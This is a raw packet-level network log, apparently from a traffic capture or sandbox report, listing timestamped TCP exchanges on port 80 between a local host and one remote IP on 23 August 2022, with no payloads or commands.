Aug 23, 2022 03:42:55.004602909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004638910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004656076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004666090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004693031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004705906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004709959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004745960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004760981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004786015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004798889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004816055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004838943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004856110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004858971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004897118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004905939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004939079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004945040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004966021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004997969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005011082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005095959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005160093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005218029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005260944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005279064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005289078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005311012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005327940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005341053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005371094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005388021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005409956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005424976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005439043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005461931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005480051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005495071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005517960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005537033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005558014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005565882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005585909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.005620003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.005645990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008582115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008641958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008682966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008688927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008712053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008713961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008727074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008749962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008768082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008790016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008793116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008830070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008860111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008887053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008898973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.008929968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.008965015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009061098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009102106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009119987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009143114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009154081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009181976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009197950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009238958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009263039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009304047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009310961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009342909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009352922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009372950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009393930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009438992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009458065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009497881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009515047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009537935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009550095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009567976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009586096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009612083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009671926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009707928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009728909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009741068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009748936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009764910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009789944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009804010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009865046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009915113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.009955883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.009987116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.010005951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.010010958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.010045052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.010075092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.011286020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.011317968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.011363029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.011380911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.011390924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.011400938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.011439085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.011457920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035731077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035794020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035835981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035855055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035876989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035888910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035896063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035917997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035943031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035958052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.035975933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.035990953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036012888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036037922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036050081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036077976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036087036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036118031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036129951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036148071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036169052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036256075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036379099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036422014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036442041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036461115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036469936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036490917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036510944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036541939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036622047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036663055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036674976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036701918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036712885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036731958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036752939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036819935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036855936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036896944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036907911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036936045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036950111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.036964893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.036988020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037024975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037025928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037070036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037084103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037107944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037122965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037136078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037157059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037177086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037189007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037215948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037225962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037256956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037271023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037313938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037334919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037363052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037369013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037415028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037420988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037472963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037482977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037524939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037532091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037573099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037585020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037632942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037645102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037694931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037707090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037750959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037755966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037800074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037808895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037858963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037870884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037920952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.037933111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037974119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.037980080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.038019896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040342093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040385008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040425062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040437937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040456057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040463924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040471077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040527105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040585041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040627956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040657997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040666103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040678024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040697098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040736914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040747881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040860891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040900946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040916920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040941000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040946960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.040971041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.040992975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041012049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041034937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041053057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041065931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041093111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041105032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041122913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041142941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041163921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041172981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041203976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041214943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041245937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041254044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041275978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041287899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041313887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041328907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041353941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041354895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041394949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041397095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041424036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041435957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041480064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041568995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041613102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041615009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041656017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041661024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041685104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041707039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041728020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041737080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041768074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041773081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041807890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041827917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041836977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.041906118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.041915894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.042572975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.042614937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.042654991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.042661905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.042686939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.042702913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.042736053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.042800903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070014000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070080042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070101976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070121050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070142984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070162058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070173025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070200920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070209980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070240021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070252895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070281982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070282936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070324898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070327997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070365906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070389986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070395947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070415020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070435047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070436954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070473909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070480108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070512056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070524931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070550919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070568085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070589066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070599079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070627928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070638895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070667028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070681095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070694923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070725918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070734978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070751905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070776939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070799112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070816040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070828915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070856094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070872068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070897102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070923090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070936918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070941925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.070967913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.070991039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071006060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071037054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071050882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071085930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071091890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071099043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071118116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071156979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071181059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071193933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071196079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071208954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071233988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071254969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071261883 CEST	80	49774	45.95.11.158	192.168.2.3
